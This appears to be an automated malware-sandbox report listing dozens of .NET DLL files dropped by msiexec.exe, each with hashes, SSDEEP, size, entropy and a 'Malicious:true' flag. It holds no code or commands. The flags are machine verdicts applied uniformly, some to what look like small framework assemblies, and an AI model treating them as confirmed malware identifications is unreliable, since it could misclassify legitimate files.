                                                                                                                                                                                                                                                                                                                                  SHA-256:BC4EDCFC6BB6D79E110FBA0D203D96B5436D99969AD71C76A423A79410378A0F
                                                                                                                                                                                                                                                                                                                                  SHA-512:8CADDE72709AA52921C6175517B6DCC51D97D4207A1833A6071B876CFDC71BE0EFEF2CA65EB99E5B705A85E4F07CE363A0BBB55BC38C4BD6BE1483A5A871D6C4
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):808712
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.664977714687645
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:H9Dux8VLSQjVqSlDrd5BpwxL55pskx5d7Cil:Htux8VLSQjVqSlDrd5BOxjmkx5d7CC
                                                                                                                                                                                                                                                                                                                                  MD5:5475964C62302DFD0A25A7243A9515CE
                                                                                                                                                                                                                                                                                                                                  SHA1:2E4FF863094D9E72BB1454066002DCA346A290F1
                                                                                                                                                                                                                                                                                                                                  SHA-256:B9720FCA323DD3B0169ABF221692C7A3F236FAF90C5694E10FA2806B5E41FD03
                                                                                                                                                                                                                                                                                                                                  SHA-512:2FEEC780CA49E2E018C26C9BC43FC0D6CFBEC590318437621C65C7B155EE233FD34B7534E515F0967B4110CC2077CDA0C01E8232C3C5C0B5128FF25709C656E7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):486664
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.690959844635634
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:SLV6FPkjfmpzkb1gH0BEuUWZpQmMcxhRl3W1E:RHFcY0BEuUWHQmMcxhC1E
                                                                                                                                                                                                                                                                                                                                  MD5:6285B8AFEAF9C4ECC2519A2ABCDA4A5D
                                                                                                                                                                                                                                                                                                                                  SHA1:AF11E8E1F8E904C93C47A28CDC606E66D2AB9C38
                                                                                                                                                                                                                                                                                                                                  SHA-256:B48DC65ABE78E81118D4C382C80650F5AE0D99AB6FBEBCD4DEAAB00FF7E0DBB8
                                                                                                                                                                                                                                                                                                                                  SHA-512:78DF10774CF735C6518E91D50ED5B2A0906F1174CF5F7A42B3328C5B688980540576F43BA73B133E2D2C1DB57D0A1AF8D1880DE02F234EBDC57B6F2E2D5400C3
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):189616
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.63337493461881
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:G6RmWBsH04GekCQUVP2xrwjy09JN/KBWAUQ335BotiEqKaMJDByGjLz:aWBs3jikjUBotrJMGjv
                                                                                                                                                                                                                                                                                                                                  MD5:6DA6288454299B3A91665D9A3FFD66BD
                                                                                                                                                                                                                                                                                                                                  SHA1:D2E26B1D89E7817899F6AD2898AC704CC6F2CD59
                                                                                                                                                                                                                                                                                                                                  SHA-256:89B1575E5F32F368B53496A3F15529FEDE58C0324E1A12FCD20609D6CA4DAA63
                                                                                                                                                                                                                                                                                                                                  SHA-512:A0301422806C16AA8990AC2936EB62468E089F4786909C41EAFDC4E6B0A40DBB7D3E1D544A954C705E8584E22FF30172A9909A860BACBC41C234BB640892949C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):93960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.412269331705843
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:Rh4T10wJ4hT5wzwW7c1LyoOeSRzxIdvaJyiyTzk0:R8SH5wzXcLyheSRzxavaQjTY0
                                                                                                                                                                                                                                                                                                                                  MD5:C048A59F3891B02B3BC8A194F3D21026
                                                                                                                                                                                                                                                                                                                                  SHA1:30D9CEB4188CF4A4B17138CAEFD3B2451B05D292
                                                                                                                                                                                                                                                                                                                                  SHA-256:59FAD34EEEE26623D44EE9D541D0E53D89A4D8A42BFF59FE466950A771BF4CFB
                                                                                                                                                                                                                                                                                                                                  SHA-512:27674625D2D249BF794DBC7F893FA403245A78B3D3DE7E32C72EC9CC7F496C2AF6752FC87B4599462128BDCBDDDF459C6754E1FDFF6148E0EFB7255FF72DE270
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.247706814220908
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:h9WAmkijRW8bwPV0D/F/pQ+1+HCeqtwlSYmxNOcVIFN2PiYA6VFHRN7xRxB+R9zD:ALeqylSYm71VI6qFClxRxw9zfr
                                                                                                                                                                                                                                                                                                                                  MD5:9648F56C224A96801B518AE5386AA184
                                                                                                                                                                                                                                                                                                                                  SHA1:9896F6B1D9A296BA0FF244A555814D52D914431C
                                                                                                                                                                                                                                                                                                                                  SHA-256:FFF0AAE4CAB8C18D606E6246FE42F290143DB0D3A88A1A1229A77D8BD8441E67
                                                                                                                                                                                                                                                                                                                                  SHA-512:C73F115BB4D0F40FF4723B634F74B909F29142A930B90431FA4395B7A6EE4FF3A5715A9D141D92D56448578D6A325637207644A330DA92D2756D363840D8AE8D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):134832
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.565847770018715
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:nmpOj/BZX3krpmsUjMM+JbVUowS0hcbGWbrrrrrrrrrrrrrrrrrrrrrrrrrrrrr0:OOzBZXCPMpcbGnKk
                                                                                                                                                                                                                                                                                                                                  MD5:5CF4F3F906B7DC346D47B0796B2D621D
                                                                                                                                                                                                                                                                                                                                  SHA1:FCF0DE67C5D07ACE0D8951C2537636F99DE8D300
                                                                                                                                                                                                                                                                                                                                  SHA-256:77ED6C9832BBECAE32FE536D891EDA847405FA6AFE8801BE05B37FF6F759D299
                                                                                                                                                                                                                                                                                                                                  SHA-512:B9F501D60EB7CF60480D2BA9F2115FB99A88E9D2014E36FB49CEE0654C4FF79E219A7F3E0E838E6902ECDE1187386C0819A39B88CE171B4207724EC05C39287A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):569112
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.705893750506672
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:vAcy1XypsaHU2lIwi3iX4MbITp9whYDgPbxmBVWDw7nzNZwz:vsXyG6U2l0yYDgPbxmfWDwrT2
                                                                                                                                                                                                                                                                                                                                  MD5:AD8966E489A4FEB1AD013A6B8A193D1D
                                                                                                                                                                                                                                                                                                                                  SHA1:354514606D252A88BC71D04DBBA4353C14B99FB9
                                                                                                                                                                                                                                                                                                                                  SHA-256:78D5ADA7A18329B9902DFBB0AFD4F2D3A56A761D1A25E28BE0959B9C7E856783
                                                                                                                                                                                                                                                                                                                                  SHA-512:E211E153EB349C249750172DBEFA48DEC4CE01D8A935D353C37C61E7E04B373A7C76C7E8D2CCA2FCF8DE77DC0BB6C3ABAF54829FC993DC80263C511EBF4BBF33
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):151712
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.659992108362537
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:bhGUnc0ENS370LLFNAzreyfs2A1upqcyeeRAr:lvc5Np5N1Os2fmI
                                                                                                                                                                                                                                                                                                                                  MD5:64AEB21B8C192B802F2C7DBF18F9C2E0
                                                                                                                                                                                                                                                                                                                                  SHA1:3740D3BC11D4F46909FE0F552B146B473922D70C
                                                                                                                                                                                                                                                                                                                                  SHA-256:2DA3E9DCA14992E113B470A0D711A51FD265D7775D9AFFA7DBDF6BEC929601C0
                                                                                                                                                                                                                                                                                                                                  SHA-512:BC979D59F8F3D3AE8B0E7E9E4A7F76A6BE08D48A8940B014CDEA532B6EF10DA2DBE9D528A4F2ADEDF98D23C3A5B287F1570B1A0CDCC68FEEC5D7C1C3C0351425
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15640
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.835682351794018
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:mFQiRxx1WjWVUFfW+WHWxNzx95jmHnhWgN7acWel9HeAwKUWX01k9z3Aia+6w7Eu:mT/EWiFfWTIX6HRN753HO2R9zza+d1
                                                                                                                                                                                                                                                                                                                                  MD5:66B8459A7C59846CD44FF73680C4D57C
                                                                                                                                                                                                                                                                                                                                  SHA1:5521416312890B86C416345F22DA8E1322E2F8E5
                                                                                                                                                                                                                                                                                                                                  SHA-256:10BDF418B380871231F3DB7EC68D756E5935D4EF39F97C017B07E5A4308C7468
                                                                                                                                                                                                                                                                                                                                  SHA-512:6BF64AFD3EA6D2D3EEF3EE8D278FC6504E7DB694AFDD5191883C3690B76C67F4F234F0B6CDF4945A5A705BC1B90A9C29D9CA4F3066AF18BEC2179230CC85AFF6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.8222624190824
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:sXt7kBrr7Hxo5qW193WZpWjA6Kr4PFHnhWgN7agWF1tfKUSIX01k9z3ARq/c9:yterFiqW193WZYA6VFHRN72D2IR9zoH
                                                                                                                                                                                                                                                                                                                                  MD5:D250B5CDEAD6EB54586E910070B68674
                                                                                                                                                                                                                                                                                                                                  SHA1:68B939B43A46DB57F4B500CB51A9A976EFC0862B
                                                                                                                                                                                                                                                                                                                                  SHA-256:E0BC424EFD7068DFC45FEA7CB30AE38D0B1A654CC74EF6C1D501D2CE688F6E07
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF8AFF3A868831E4F4F39385300D4B702C0321CF15E8D0B38A5059D44C454B21C8C82BA4D26CA6A2966DE9DB8E963788921B34896CAA357FEB3F39E50541131A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18696
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.605933383250857
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:p+rueDGLr3WsBDWuxYA6VFHRN72FNbZR9zahhe:teDGPpvFCl2FFT9zse
                                                                                                                                                                                                                                                                                                                                  MD5:05968C5075CF8057D3330A93AA54CF64
                                                                                                                                                                                                                                                                                                                                  SHA1:D7AD923779991EFFA838F107F949358B36AE1B99
                                                                                                                                                                                                                                                                                                                                  SHA-256:E9FE6E6B9C8F6FED5C3E44D094742F762E67528FF943FEFB52D03B0422D4F8A0
                                                                                                                                                                                                                                                                                                                                  SHA-512:2EB2925D269A1C09A1BF5012563A3509322C16CC68B04B3210EB47FA7A92DDC78D23C3CBAD99D4E2A3F326CD6CE4F3723980D834FE917173B0BFEA3AA45786AE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17680
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.6083676504439905
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:AiSEs6760DX88Hg10WGlD5WdpWjA6Kr4PFHnhWgN7agW43fKUSIX01k9z3ARq+da:Axj10WyD5WdYA6VFHRN7xP2IR9zojda
                                                                                                                                                                                                                                                                                                                                  MD5:8D40E6093D4EB840E2480D6E383EB442
                                                                                                                                                                                                                                                                                                                                  SHA1:2EA0372488E3EFCFAB7074751DF8B60309DDBB0C
                                                                                                                                                                                                                                                                                                                                  SHA-256:9DDCC239CE0E75AA7845E6DE8B31ADAA25C6B5EEE78D75EE904CDBBED7C7BBA0
                                                                                                                                                                                                                                                                                                                                  SHA-512:9FCC45BDDCF4B187B15C8EDA5E6CA40D7825B7A6D1142772EEA9B70A1F9967D7A9C709E513B0EB91A2200F301A72F356142408861DC4FEA27AA0CF825C64A838
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16648
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.715278782126483
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:alWpWnizlpFWqYA6VFHRN7qcTR9z6IkON:a4lFCl3V9zGON
                                                                                                                                                                                                                                                                                                                                  MD5:AA81502801E5AF25A5F74303D00A755A
                                                                                                                                                                                                                                                                                                                                  SHA1:590784EF4329D7F411979FFB77EA673C03B0539B
                                                                                                                                                                                                                                                                                                                                  SHA-256:F72F7BC1E1F16D3CF4F6C3162862F7F97B9108186BBD929B55DD94E6E98584D4
                                                                                                                                                                                                                                                                                                                                  SHA-512:509F31F1487081DD1D2B303B9C2F60E1620AF7D1D999A036B4B91FEAB085CD86101453E552993D1B913C5239AD575CC224708B3B6E23054E2E139B86CB66125B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):871176
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.50414684491355
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:L47xn7kZQ6kliVreJIHHr0tRYbKr2KtG9VKABC6rPfREDfP7/1qiVhIWCC:LK9km6k/IwRYbiBeKGCUREDrZV2hC
                                                                                                                                                                                                                                                                                                                                  MD5:9D199E9F27CB473674BAB5BFC70F6871
                                                                                                                                                                                                                                                                                                                                  SHA1:F7069C033BB340E81C1BE7BD4BC062EE21347B09
                                                                                                                                                                                                                                                                                                                                  SHA-256:5FA8A35279B15DE005337AC2B59CDE11A147C21143B12564A453F1CD44566170
                                                                                                                                                                                                                                                                                                                                  SHA-512:D46DA52295442A82DFDD6BD3CBB2949A79CD8B51B31EB1E176476E455D216D1C7ED55ED6F4B44289A3081C8A9C06020DE29C8F0D0D22CA40AAC117D043F740CF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16144
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.7268764981814115
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:mNZvlXIW6zJWUYA6VFHRN7cUvY2IR9zoOaC:4s1FClZvbU9z3X
                                                                                                                                                                                                                                                                                                                                  MD5:DB5F67EC7D4CEFE625549E650C2B783D
                                                                                                                                                                                                                                                                                                                                  SHA1:0EE4FB5F26575B570122AE3C9A184DDD0B3EBA49
                                                                                                                                                                                                                                                                                                                                  SHA-256:3CC4AFFE60DC1DE5F66706B39A24D7E96D708A463A9A92A05288D6BA246E09E5
                                                                                                                                                                                                                                                                                                                                  SHA-512:4D86E8E161CEFB0596F1D98D52D18107CE51D6155D42C1BDDC200710BCA88317B01B2E0E84C39E85E7E70E9023B2AFB2E79737F3ED32973EB0D3106806F4247A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16160
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.78497387239177
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
Malicious: true
Reputation: unknown
Process: C:\Windows\System32\msiexec.exe
File Type: PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 131376
Entropy (8bit): 6.512717394823719
Encrypted: false
Malicious: true
Reputation: unknown
Process: C:\Windows\System32\msiexec.exe
File Type: PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 1486120
Entropy (8bit): 6.807053388231781
Encrypted: false
Malicious: true
Reputation: unknown
Process: C:\Windows\System32\msiexec.exe
File Type: PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 530184
Entropy (8bit): 6.7797079476090305
Encrypted: false
Malicious: true
Reputation: unknown
Process: C:\Windows\System32\msiexec.exe
File Type: PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 125208
Entropy (8bit): 6.692637451202541
Encrypted: false
Malicious: true
Reputation: unknown
Process: C:\Windows\System32\msiexec.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 16136
Entropy (8bit): 6.733717704448286
Encrypted: false
Malicious: true
Reputation: unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):505608
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.7763170175701335
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:Q5EzXX03uPIhSTcNO/LSsjM5REz4sr4CGFHD6ioscEu/L2SJkSGskfT5v3P1m9rM:Q5Ib0CGFHuioHEdS2vBb5v30COTxwZ
                                                                                                                                                                                                                                                                                                                                  MD5:E332D97CC4AE5DFC6606640A64E7A766
                                                                                                                                                                                                                                                                                                                                  SHA1:ED7C0E78AEC95A6AE10F9DFA7B62728C06E4744A
                                                                                                                                                                                                                                                                                                                                  SHA-256:3411CCC0B6BA1FF70D550A8B7D2D3A373A79584B36C90C06D7BF400AA74EB39A
                                                                                                                                                                                                                                                                                                                                  SHA-512:900ACB2D761A285D7F0E97C9F548D166535329F722D99B285715F284C0C1392AFBEFF44A9E67DA2DF2866177A6778CA9D4F038C3EFF5560B872DB4398D56F5D8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.821262984361922
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Z7z05p091rcmOD5RnGWSNXW0YA6VFHRN7xWMR9z2cO:Z7gAuEPFClz9zq
                                                                                                                                                                                                                                                                                                                                  MD5:7175CFF820ACB9389C713410DD582063
                                                                                                                                                                                                                                                                                                                                  SHA1:F1C47E2B46084FEFFB44BB88D51A3932FB1F3042
                                                                                                                                                                                                                                                                                                                                  SHA-256:D060226E814A1DDF9F607AFAE51F7D5698F8E435A63FCE107E78239E349BA2AC
                                                                                                                                                                                                                                                                                                                                  SHA-512:BCDEBAE2F49084BC3F5AB9097715235E6C0A2257A783B14EAE49F2BA16DD59DA87CDE24DF5CEE6732194F8146B34B0ED4428BC2847E5ACCDA95FF637EC32A5CD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):139024
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.702745878398023
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:brCD+EGnNfGAKUDXxT3LBzdQZ4/FJg9C5OR291oVcJUQz:Hw9GNGAKUbxxzKZ8zaCUQ
                                                                                                                                                                                                                                                                                                                                  MD5:906D0531114C584A2E5EA50BDA99DDC2
                                                                                                                                                                                                                                                                                                                                  SHA1:FF650B1743C72683BC0019DB15332D01DE6ED993
                                                                                                                                                                                                                                                                                                                                  SHA-256:BF2C3F9EBC2A48493796F4002984F43E4630A2DB3FD26F70BD79355F3FF1D563
                                                                                                                                                                                                                                                                                                                                  SHA-512:9F50718BA3C3EC370D3AFAB850B962539CD3C84FC222485DE68289129C0443DD880B86CFED46F68CB9860CB8984E9C09386D3B756B908E160FE55CBEEC2D47AD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.7117476098810185
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:5vCj4AG3tNKiuqFzTR9WHRzWGwYA6VFHRN729WR9zjD:9Cj4LNRuN7wFClF9z/
                                                                                                                                                                                                                                                                                                                                  MD5:0822C689624C42040E5E6F38752AF2C8
                                                                                                                                                                                                                                                                                                                                  SHA1:21002E79AE998FC7B5453C77F09CB036710DBEAD
                                                                                                                                                                                                                                                                                                                                  SHA-256:E9B81690E9D7B3D67C32EB5948D63CC3E1136FF8FA19A19F2A0F5572FF6F8788
                                                                                                                                                                                                                                                                                                                                  SHA-512:1D5D2606C5FEB76EC2187098090DD928C4491EA69A5A46BD5ADAFD2EB8052CAE050F473AA8C078061965960CCBD126543B684EA18EA3D9DD50B8C1C8D0D057D4
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16144
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.760009477775305
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:x6z2EZZV7DiWcZ7WjYA6VFHRN7/QD9R9zrJR+:axa0FClYb9zG
                                                                                                                                                                                                                                                                                                                                  MD5:3661BDD366B6EE1834577CB553D41C88
                                                                                                                                                                                                                                                                                                                                  SHA1:35DB9E13602F99C97F505E12624EFF3E873FD553
                                                                                                                                                                                                                                                                                                                                  SHA-256:E5575C2CFB312E9239978A2D439802F4D8D55C776D10B763ECBE20D2057982E9
                                                                                                                                                                                                                                                                                                                                  SHA-512:43C774556594FBFCC437B1A02FB1C938624E6D379985731A41F78E3782ADA4D8C143D32886794A7ED865FC917378C427DF90144D364F9ECBB8ADDF18CD129FC6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16160
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.712802666065952
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
